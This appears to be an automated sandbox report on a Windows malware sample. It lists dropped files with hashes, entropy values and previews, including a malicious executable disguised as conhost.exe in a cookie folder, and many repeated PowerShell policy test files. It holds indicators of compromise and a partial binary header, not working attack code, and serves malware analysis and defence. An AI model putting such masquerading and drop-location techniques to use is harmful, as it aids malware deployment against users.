                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):52
                                                      Entropy (8bit):5.056020968057882
                                                      Encrypted:false
                                                      SSDEEP:3:9rDusx+8Z8c2uyKPOn:9FuVuPPOn
                                                      MD5:1F646936D6161A17FDF0C127D153A8D2
                                                      SHA1:3DE017E61E7C398CEBF6CBD272D64027995290FD
                                                      SHA-256:8B57906FB7D788AC05295878D2FA19569A410A5205B75D92EB97C2FB14DE529B
                                                      SHA-512:D826A8EC7EE82ADF2EB90186B015FC5DD17F7B4148015B4CF39DB2F11D755C64CC6FFD18BD799448A31293DDB05B461B44701DFD2CF72FF7E64D0B6331D7BA25
                                                      Malicious:false
                                                      Preview:JgcJoq6yw4Tq0fDzQQtfST5NYyMvkZyAZ9qvSsurpDtAHd3nKwjk

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CPNSQusnwC.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1698
                                                      Entropy (8bit):5.367720686892084
                                                      Encrypted:false
                                                      SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
                                                      MD5:5E2B46F197ED0B7FCCD1F26C008C2CD1
                                                      SHA1:17B1F616C3D13F341565C71A7520BD788BCCC07D
                                                      SHA-256:AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
                                                      SHA-512:5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\088424020bedd6

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with very long lines (488), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):488
                                                      Entropy (8bit):5.850803368771375
                                                      Encrypted:false
                                                      SSDEEP:12:+rUJ+/gcUxQLTpmwNpyfDtUCFF6wHAQeU:Pco4pH3EtUe8XQeU
                                                      MD5:64F7FAC040E6016B4F1C86B2BDD77447
                                                      SHA1:390EC8B7D460C3A1399A18328FBF744A78E8D085
                                                      SHA-256:FFE39D87A17D1FC87A7156ADF97283947D3C229CA765E688AEE08E9760951187
                                                      SHA-512:B7E2DE0828B51C664A50EDCD512366D4FF30B2371460925FB641273B7E1A210F139F404454CF653A983D92D01E0434A9063CE146D6E819919201A75D98176FF9
                                                      Malicious:false
                                                      Preview:LNWFSQ0zRhifCzPj5F45jkx0OfrP0KD65NezX4yMCy3PAEc2eQqI044kaf0wjk8HdlkzVZMARs2urh0JDyvke4GBS3Z1EBmczwwYenhFDp1IBK32pqtvzYmifjgbAU6PGa45vcpaRpgyC89H9gMXS1maJN25GFEttmBkP8GNBTdJ2yfhjYbdIj6OxdvijtTLlxEa6Y2Ba9V9XciUrUVsnllKpxwvMinR9RiFuFlKgaDIN70U5b0OYli9L3uImGy1VD9G4dkltLLMhc7s6b0vrZ3Yti30VcialLxJ7uac0PeMZVct6BLKPDK6KlWVjtQQmvkVpxvMBY4c4q8XGJ4TQYKiB09VXF2G9OjnuGEIQ9I1IrCdm8OZz6AOkCTyyZy6fxdqGVnAFvDRPTaUyftZ0cRCOVDswQU0LMWUOVWRVOUE2s9Rl99TqYFCgacvR5OybNFC7FFdIbEmHNKfVvGwRAKwHTyy3k9a9gmpn6Ug

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\conhost.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2670080
                                                      Entropy (8bit):4.629619443814358
                                                      Encrypted:false
                                                      SSDEEP:24576:eRDNakc4BcCw7sUL/4cIG5IuUe1QdcqTHmdbBs3eJCZrCsjOEKka+wlFlett6t1:yDNu4BaMcQmQmqyHM6sslnE
                                                      MD5:A26ED7DC21BC77F20C0251FA25738D02
                                                      SHA1:8FC82929941D67A20C76976E796FEAB701795C2F
                                                      SHA-256:18E83D9FABE142A751C644F12D223E6C4825912573A352551361ABDE977D753F
                                                      SHA-512:5E8044FD8E78AAD306D8FFD3B3BBC6583CC353C8CDDDA1A15B05A22FCF7815A770482418BDB120C679F784017741E36C87AA5BB053008CC94FE9560B97366838
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......(...........(.. ....(...@.. ....................... ).....>J)...@.................................<.(.O.....(.p.....................)...................................................... ............... ..H............text.....(.. ....(................. ..`.rsrc...p.....(.......(.............@..@.reloc........).......(.............@..B................p.(.....H.............$.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\conhost.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):19253
                                                      Entropy (8bit):5.006124400658085
                                                      Encrypted:false
                                                      SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIepo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhipo+OdBANZD
                                                      MD5:3FD7630E6C29B02E0FFA6A1D3FB54564
                                                      SHA1:CA880B8896A98A6A2A46FB65611E07B78C4107AC
                                                      SHA-256:E5619477716ECB045FE2484E4C7318B58522BABF1CC931C6EA50603499400625
                                                      SHA-512:AA7E5DA85CC85499B0B8149D3BE9BDB767C606BCBFE54EF549B8DA65D1591A1E8014E5F1B43E281A8957DAA7BD0C68B66903FCB56E734A745981D623B2570D48
                                                      Malicious:false
                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................

                                                      C:\Users\user\AppData\Local\Temp\Oa0Kaz5Bd7

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):25
                                                      Entropy (8bit):4.0536606896881855
                                                      Encrypted:false
                                                      SSDEEP:3:mV+UNWkJu:MEkJu
                                                      MD5:F86996BDE943771B0F2F27DB4A7A0D91
                                                      SHA1:D9137C46AEF1E590888A7EE408BB7F55945AE4B9
                                                      SHA-256:6B0FA03706D8DB43945CAFE73FB3DB1C8FF26042F9C6E58A3483CAA107CF5F39
                                                      SHA-512:446FE662F2059A5E31CB858F211C4A2477F8A759F1BC5094FD6BF7B94CCAFAC7C9FBB524653D9ABE2BBED8851E791404CB4FE9BA8DE1F5BCE070E52334BB4F79
                                                      Malicious:false
                                                      Preview:3KElUwkfpMV1B3vf43Al4RBGR

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00gu5iqh.jfc.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rvgumll.yel.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qqj1xmt.xwe.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54cvjrr2.qgv.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fbnbsbj.ebx.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5s2soire.qcf.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a2fdelbw.tty.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bctjlb5w.wim.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjvqyev3.hhe.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d21h0k1w.5c3.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dghvrl21.o2w.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egcgoztv.zbl.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_erqzbirg.q21.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fi04cega.5ne.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fr0v1bpj.zz3.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fucio2jo.shx.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmkclueu.clk.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gsveqoyq.cdw.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_guijrfz1.par.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ir1rfkh4.je5.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
